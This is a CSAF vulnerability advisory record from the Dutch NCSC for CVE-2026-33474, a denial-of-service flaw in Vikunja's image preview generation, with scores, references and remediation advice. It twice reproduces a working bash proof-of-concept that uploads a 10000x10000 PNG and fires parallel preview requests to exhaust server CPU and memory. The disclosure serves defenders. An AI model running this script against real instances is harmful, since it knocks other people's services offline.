{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33474", "tracking": { "current_release_date": "2026-03-27T20:23:54.868237Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33474", "initial_release_date": "2026-03-20T21:41:08.832121Z", "revision_history": [ { "date": "2026-03-20T21:41:08.832121Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T21:41:11.431881Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T20:51:39.801250Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1).| Unknown change." }, { "date": "2026-03-24T20:51:41.908314Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:56:44.283927Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T20:56:47.707407Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:13:02.868194Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-25T18:13:04.955161Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:13:23.967228Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (1)." }, { "date": "2026-03-25T21:50:18.054378Z", "number": "10", "summary": "References created (2)." }, { "date": "2026-03-26T00:12:44.007979Z", "number": "11", "summary": "References created (2)." }, { "date": "2026-03-26T00:50:19.230685Z", "number": "12", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-27T19:47:07.645768Z", "number": "13", "summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-27T19:47:09.892078Z", "number": "14", "summary": "NCSC Score updated." } ], "status": "interim", "version": "14" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=1.0.0-rc0|<2.2.0", "product": { "name": "vers:unknown/>=1.0.0-rc0|<2.2.0", "product_id": "CSAFPID-5907214" } } ], "category": "product_name", "name": "api" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=1.0.0-rc0|<2.2.0", "product": { "name": "vers:unknown/>=1.0.0-rc0|<2.2.0", "product_id": "CSAFPID-5902491" } } ], "category": "product_name", "name": "vikunja" } ], "category": "vendor", "name": "go-vikunja" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=1.0.0|<2.2.0", "product": { "name": "vers:unknown/>=1.0.0|<2.2.0", "product_id": "CSAFPID-5944023", "product_identification_helper": { "cpe": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "vikunja" } ], "category": "vendor", "name": "vikunja" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33474", "notes": [ { "category": "description", "text": "## Summary\n- Vulnerability: Unbounded image decoding and resizing during preview generation lets an attacker exhaust CPU and memory with highly compressed but extremely large-dimension images.\n- Affected code:\n - Decoding without bounds: [task_attachment.go:GetPreview](../../tree/main/pkg/models/task_attachment.go#L219-L229)\n - Resizing path: [resizeImage](../../tree/main/pkg/models/task_attachment.go#L293-L304)\n - Endpoint invoking preview: [GetTaskAttachment](../../tree/main/pkg/routes/api/v1/task_attachment.go#L195-L203)\n- Impact: First preview generation per attachment can allocate large memory and spend significant CPU; multiple attachments or concurrent requests can degrade or crash the service.\n- CVSS v3.1: 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\n## Preconditions\n- API running locally (`http://localhost:8080`).\n- Task attachments enabled: `task_attachments_enabled=true` in [Info](../../tree/main/pkg/routes/api/v1/info.go#L82-L160).\n- Any authenticated user with write access to a task.\n\n## How It Works\n- Preview generation decodes the full image via `image.Decode` and resizes to a target width. There are no guards on width/height or total pixels. A 10,000×10,000 PNG (~284 KB on disk) expands to ~100M pixels in memory during decode and triggers heavy CPU work in resize.\n- The first preview per attachment and size performs the heavy work; later requests are served from cache [keyvalue.Remember](../../tree/main/pkg/models/task_attachment.go#L220-L244).\n\n## Run The POC\n- Script: \n```sh\n#!/usr/bin/env bash\nset -euo pipefail\n\nBASE_URL=\"${BASE_URL:-http://localhost:8080}\"\nUSERNAME=\"${USERNAME:-dosuser}\"\nEMAIL=\"${EMAIL:-dosuser@example.com}\"\nPASSWORD=\"${PASSWORD:-StrongPass123!}\"\nPROJECT_TITLE=\"${PROJECT_TITLE:-poc-dos-preview}\"\nTASK_TITLE=\"${TASK_TITLE:-DoS preview test}\"\nOUT_DIR=\"${OUT_DIR:-/tmp/vikunja-poc-dos}\"\n\nmkdir -p \"$OUT_DIR\"\n\necho \"[+] Checking instance info\"\ncurl -sS \"$BASE_URL/api/v1/info\" | tee \"$OUT_DIR/info.json\" >/dev/null\nif ! grep -q '\"task_attachments_enabled\":true' \"$OUT_DIR/info.json\"; then\n echo \"[!] Task attachments disabled\"\n exit 1\nfi\n\necho \"[+] Registering user (may already exist)\"\ncurl -sS -X POST \"$BASE_URL/api/v1/register\" \\\n -H 'Content-Type: application/json' \\\n -d '{\"username\":\"'\"$USERNAME\"'\",\"email\":\"'\"$EMAIL\"'\",\"password\":\"'\"$PASSWORD\"'\",\"language\":\"en\"}' \\\n | tee \"$OUT_DIR/register.json\" >/dev/null || true\n\necho \"[+] Logging in\"\ncurl -sS -X POST \"$BASE_URL/api/v1/login\" \\\n -H 'Content-Type: application/json' \\\n -d '{\"username\":\"'\"$USERNAME\"'\",\"password\":\"'\"$PASSWORD\"'\"}' \\\n | tee \"$OUT_DIR/login.json\" >/dev/null\nTOKEN=\"$(sed -n 's/.*\"token\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p' \"$OUT_DIR/login.json\")\"\nif [ -z \"$TOKEN\" ]; then\n echo \"[!] Failed to get token\"\n exit 1\nfi\n\necho \"[+] Creating project\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/projects\" \\\n -H 'Content-Type: application/json' \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"title\":\"'\"$PROJECT_TITLE\"'\"}' \\\n | tee \"$OUT_DIR/project.json\" >/dev/null\nPROJECT_ID=\"$(python3 -c 'import json,sys; print(json.load(open(sys.argv[1]))[\"id\"])' \"$OUT_DIR/project.json\")\"\nif [ -z \"$PROJECT_ID\" ]; then\n echo \"[!] Failed to get project id\"\n exit 1\nfi\n\necho \"[+] Creating task\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/projects/$PROJECT_ID/tasks\" \\\n -H 'Content-Type: application/json' \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"title\":\"'\"$TASK_TITLE\"'\"}' \\\n | tee \"$OUT_DIR/task.json\" >/dev/null\nTASK_ID=\"$(python3 -c 'import json,sys; print(json.load(open(sys.argv[1]))[\"id\"])' \"$OUT_DIR/task.json\")\"\nif [ -z \"$TASK_ID\" ]; then\n echo \"[!] Failed to get task id\"\n exit 1\nfi\n\necho \"[+] Generating 10000x10000 PNG payload\"\npython3 - <<'PY'\nfrom PIL import Image\nimg = Image.new('RGB', (10000,10000), color=(0,0,0))\nimg.save('/tmp/vikunja-poc-dos/huge.png', optimize=True)\nPY\nfile \"$OUT_DIR/huge.png\" || true\nls -lh \"$OUT_DIR/huge.png\" || true\n\necho \"[+] Uploading attachment\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/tasks/$TASK_ID/attachments\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -F \"files=@$OUT_DIR/huge.png\" \\\n | tee \"$OUT_DIR/attach.json\" >/dev/null\nATTACHMENT_ID=\"$(python3 -c 'import json,sys; d=json.load(open(sys.argv[1])); print(d[\"success\"][0][\"id\"])' \"$OUT_DIR/attach.json\")\"\nif [ -z \"$ATTACHMENT_ID\" ]; then\n echo \"[!] Failed to get attachment id\"\n exit 1\nfi\n\necho \"[+] Requesting preview (xl)\"\n/usr/bin/time -l curl -sS -o \"$OUT_DIR/preview_xl.png\" \\\n \"$BASE_URL/api/v1/tasks/$TASK_ID/attachments/$ATTACHMENT_ID?preview_size=xl\" \\\n -H \"Authorization: Bearer $TOKEN\" 2> \"$OUT_DIR/time_xl.txt\"\ndu -h \"$OUT_DIR/preview_xl.png\" || true\nfile \"$OUT_DIR/preview_xl.png\" || true\necho \"[+] Timing and memory (from /usr/bin/time):\"\ncat \"$OUT_DIR/time_xl.txt\" || true\n\necho \"[+] Parallel preview requests (cache warm) x10\"\nseq 1 10 | xargs -P 5 -I{} sh -c \"curl -s -w '%{time_total}\\n' -o /dev/null \\\n '$BASE_URL/api/v1/tasks/$TASK_ID/attachments/$ATTACHMENT_ID?preview_size=xl' \\\n -H 'Authorization: Bearer $TOKEN'\" | tee \"$OUT_DIR/parallel_times.txt\" >/dev/null\necho \"[+] Done. Outputs in $OUT_DIR\"\n\n```\n- Uses `curl` and `python3` (Pillow) to generate a 10k×10k PNG, upload it, and request an xl preview while recording timing and memory metrics.\n\n### Steps\n1. Ensure the API is running on `http://localhost:8080`.\n2. Execute:\n ```\n bash pocs/image-preview-dos/poc.sh\n ```\n3. Outputs of interest:\n - `/tmp/vikunja-poc-dos/time_xl.txt`: `/usr/bin/time -l` timing and memory for the preview request.\n - `/tmp/vikunja-poc-dos/parallel_times.txt`: 10 parallel preview times with cache warmed.\n - `/tmp/vikunja-poc-dos/preview_xl.png`: Generated 800×800 preview.\n\n### Environment Overrides\n- BASE_URL: API base (default `http://localhost:8080`)\n- USERNAME, EMAIL, PASSWORD: credentials for the test user\n- PROJECT_TITLE, TASK_TITLE: names for test artifacts\n- OUT_DIR: output directory (default `/tmp/vikunja-poc-dos`)\n\n## Expected Results\n- First preview request shows higher latency and memory footprint, demonstrating server-side decode and resize of a 10k×10k image.\n- Subsequent requests are faster due to caching.\n- Parallel requests across multiple unique attachments reproduce the heavy work and can degrade the API.\n\n## Remediation\n- Enforce bounds prior to decode:\n - Reject images exceeding max width/height (e.g., 8000×8000) or max total pixels (e.g., 20M).\n - Fail early by reading headers to extract dimensions before full decode.\n- Add per-user and per-attachment rate limiting for preview generation.\n- Pre-generate previews asynchronously with throttling and backpressure.\n- Keep caching, but consider configurable cache eviction strategy to avoid repeated heavy work.\n\n## Notes\n- This POC uses a solid-color PNG to produce large dimensions with small file size. Other formats and images with extreme dimensions can be substituted.", "title": "github - https://api.github.com/advisories/GHSA-wc83-79hj-hpmq" }, { "category": "description", "text": "Vikunja is an open-source self-hosted task management platform. Starting in version 1.0.0-rc0 and prior to version 2.2.0, unbounded image decoding and resizing during preview generation lets an attacker exhaust CPU and memory with highly compressed but extremely large-dimension images. Version 2.2.0 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33474.json" }, { "category": "description", "text": "Vikunja is an open-source self-hosted task management platform. Starting in version 1.0.0-rc0 and prior to version 2.2.0, unbounded image decoding and resizing during preview generation lets an attacker exhaust CPU and memory with highly compressed but extremely large-dimension images. Version 2.2.0 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33474" }, { "category": "description", "text": "## Summary\n- Vulnerability: Unbounded image decoding and resizing during preview generation lets an attacker exhaust CPU and memory with highly compressed but extremely large-dimension images.\n- Affected code:\n - Decoding without bounds: [task_attachment.go:GetPreview](../../tree/main/pkg/models/task_attachment.go#L219-L229)\n - Resizing path: [resizeImage](../../tree/main/pkg/models/task_attachment.go#L293-L304)\n - Endpoint invoking preview: [GetTaskAttachment](../../tree/main/pkg/routes/api/v1/task_attachment.go#L195-L203)\n- Impact: First preview generation per attachment can allocate large memory and spend significant CPU; multiple attachments or concurrent requests can degrade or crash the service.\n- CVSS v3.1: 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\n## Preconditions\n- API running locally (`http://localhost:8080`).\n- Task attachments enabled: `task_attachments_enabled=true` in [Info](../../tree/main/pkg/routes/api/v1/info.go#L82-L160).\n- Any authenticated user with write access to a task.\n\n## How It Works\n- Preview generation decodes the full image via `image.Decode` and resizes to a target width. There are no guards on width/height or total pixels. A 10,000×10,000 PNG (~284 KB on disk) expands to ~100M pixels in memory during decode and triggers heavy CPU work in resize.\n- The first preview per attachment and size performs the heavy work; later requests are served from cache [keyvalue.Remember](../../tree/main/pkg/models/task_attachment.go#L220-L244).\n\n## Run The POC\n- Script: \n```sh\n#!/usr/bin/env bash\nset -euo pipefail\n\nBASE_URL=\"${BASE_URL:-http://localhost:8080}\"\nUSERNAME=\"${USERNAME:-dosuser}\"\nEMAIL=\"${EMAIL:-dosuser@example.com}\"\nPASSWORD=\"${PASSWORD:-StrongPass123!}\"\nPROJECT_TITLE=\"${PROJECT_TITLE:-poc-dos-preview}\"\nTASK_TITLE=\"${TASK_TITLE:-DoS preview test}\"\nOUT_DIR=\"${OUT_DIR:-/tmp/vikunja-poc-dos}\"\n\nmkdir -p \"$OUT_DIR\"\n\necho \"[+] Checking instance info\"\ncurl -sS \"$BASE_URL/api/v1/info\" | tee \"$OUT_DIR/info.json\" >/dev/null\nif ! grep -q '\"task_attachments_enabled\":true' \"$OUT_DIR/info.json\"; then\n echo \"[!] Task attachments disabled\"\n exit 1\nfi\n\necho \"[+] Registering user (may already exist)\"\ncurl -sS -X POST \"$BASE_URL/api/v1/register\" \\\n -H 'Content-Type: application/json' \\\n -d '{\"username\":\"'\"$USERNAME\"'\",\"email\":\"'\"$EMAIL\"'\",\"password\":\"'\"$PASSWORD\"'\",\"language\":\"en\"}' \\\n | tee \"$OUT_DIR/register.json\" >/dev/null || true\n\necho \"[+] Logging in\"\ncurl -sS -X POST \"$BASE_URL/api/v1/login\" \\\n -H 'Content-Type: application/json' \\\n -d '{\"username\":\"'\"$USERNAME\"'\",\"password\":\"'\"$PASSWORD\"'\"}' \\\n | tee \"$OUT_DIR/login.json\" >/dev/null\nTOKEN=\"$(sed -n 's/.*\"token\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p' \"$OUT_DIR/login.json\")\"\nif [ -z \"$TOKEN\" ]; then\n echo \"[!] Failed to get token\"\n exit 1\nfi\n\necho \"[+] Creating project\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/projects\" \\\n -H 'Content-Type: application/json' \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"title\":\"'\"$PROJECT_TITLE\"'\"}' \\\n | tee \"$OUT_DIR/project.json\" >/dev/null\nPROJECT_ID=\"$(python3 -c 'import json,sys; print(json.load(open(sys.argv[1]))[\"id\"])' \"$OUT_DIR/project.json\")\"\nif [ -z \"$PROJECT_ID\" ]; then\n echo \"[!] Failed to get project id\"\n exit 1\nfi\n\necho \"[+] Creating task\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/projects/$PROJECT_ID/tasks\" \\\n -H 'Content-Type: application/json' \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\"title\":\"'\"$TASK_TITLE\"'\"}' \\\n | tee \"$OUT_DIR/task.json\" >/dev/null\nTASK_ID=\"$(python3 -c 'import json,sys; print(json.load(open(sys.argv[1]))[\"id\"])' \"$OUT_DIR/task.json\")\"\nif [ -z \"$TASK_ID\" ]; then\n echo \"[!] Failed to get task id\"\n exit 1\nfi\n\necho \"[+] Generating 10000x10000 PNG payload\"\npython3 - <<'PY'\nfrom PIL import Image\nimg = Image.new('RGB', (10000,10000), color=(0,0,0))\nimg.save('/tmp/vikunja-poc-dos/huge.png', optimize=True)\nPY\nfile \"$OUT_DIR/huge.png\" || true\nls -lh \"$OUT_DIR/huge.png\" || true\n\necho \"[+] Uploading attachment\"\ncurl -sS -X PUT \"$BASE_URL/api/v1/tasks/$TASK_ID/attachments\" \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -F \"files=@$OUT_DIR/huge.png\" \\\n | tee \"$OUT_DIR/attach.json\" >/dev/null\nATTACHMENT_ID=\"$(python3 -c 'import json,sys; d=json.load(open(sys.argv[1])); print(d[\"success\"][0][\"id\"])' \"$OUT_DIR/attach.json\")\"\nif [ -z \"$ATTACHMENT_ID\" ]; then\n echo \"[!] Failed to get attachment id\"\n exit 1\nfi\n\necho \"[+] Requesting preview (xl)\"\n/usr/bin/time -l curl -sS -o \"$OUT_DIR/preview_xl.png\" \\\n \"$BASE_URL/api/v1/tasks/$TASK_ID/attachments/$ATTACHMENT_ID?preview_size=xl\" \\\n -H \"Authorization: Bearer $TOKEN\" 2> \"$OUT_DIR/time_xl.txt\"\ndu -h \"$OUT_DIR/preview_xl.png\" || true\nfile \"$OUT_DIR/preview_xl.png\" || true\necho \"[+] Timing and memory (from /usr/bin/time):\"\ncat \"$OUT_DIR/time_xl.txt\" || true\n\necho \"[+] Parallel preview requests (cache warm) x10\"\nseq 1 10 | xargs -P 5 -I{} sh -c \"curl -s -w '%{time_total}\\n' -o /dev/null \\\n '$BASE_URL/api/v1/tasks/$TASK_ID/attachments/$ATTACHMENT_ID?preview_size=xl' \\\n -H 'Authorization: Bearer $TOKEN'\" | tee \"$OUT_DIR/parallel_times.txt\" >/dev/null\necho \"[+] Done. Outputs in $OUT_DIR\"\n\n```\n- Uses `curl` and `python3` (Pillow) to generate a 10k×10k PNG, upload it, and request an xl preview while recording timing and memory metrics.\n\n### Steps\n1. Ensure the API is running on `http://localhost:8080`.\n2. Execute:\n ```\n bash pocs/image-preview-dos/poc.sh\n ```\n3. Outputs of interest:\n - `/tmp/vikunja-poc-dos/time_xl.txt`: `/usr/bin/time -l` timing and memory for the preview request.\n - `/tmp/vikunja-poc-dos/parallel_times.txt`: 10 parallel preview times with cache warmed.\n - `/tmp/vikunja-poc-dos/preview_xl.png`: Generated 800×800 preview.\n\n### Environment Overrides\n- BASE_URL: API base (default `http://localhost:8080`)\n- USERNAME, EMAIL, PASSWORD: credentials for the test user\n- PROJECT_TITLE, TASK_TITLE: names for test artifacts\n- OUT_DIR: output directory (default `/tmp/vikunja-poc-dos`)\n\n## Expected Results\n- First preview request shows higher latency and memory footprint, demonstrating server-side decode and resize of a 10k×10k image.\n- Subsequent requests are faster due to caching.\n- Parallel requests across multiple unique attachments reproduce the heavy work and can degrade the API.\n\n## Remediation\n- Enforce bounds prior to decode:\n - Reject images exceeding max width/height (e.g., 8000×8000) or max total pixels (e.g., 20M).\n - Fail early by reading headers to extract dimensions before full decode.\n- Add per-user and per-attachment rate limiting for preview generation.\n- Pre-generate previews asynchronously with throttling and backpressure.\n- Keep caching, but consider configurable cache eviction strategy to avoid repeated heavy work.\n\n## Notes\n- This POC uses a solid-color PNG to produce large dimensions with small file size. Other formats and images with extreme dimensions can be substituted.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-wc83-79hj-hpmq.json?alt=media" }, { "category": "description", "text": "Vikunja Affected by DoS via Image Preview Generation in code.vikunja.io/api.\n\nNOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.\n\n(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)\n\nThe additional affected modules and versions are: code.vikunja.io/api from v1.0.0-rc0 before v2.2.0.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4811.json?alt=media" }, { "category": "other", "text": "0.0004", "title": "EPSS" }, { "category": "other", "text": "3.5", "title": "NCSC Score" }, { "category": "other", "text": "Exploit code publicly available, There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5902491", "CSAFPID-5907214", "CSAFPID-5944023" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-wc83-79hj-hpmq" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33474.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33474" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-wc83-79hj-hpmq.json?alt=media" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4811.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-wc83-79hj-hpmq" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-wc83-79hj-hpmq" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33474" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5902491", "CSAFPID-5907214", "CSAFPID-5944023" ] } ], "title": "CVE-2026-33474" } ] }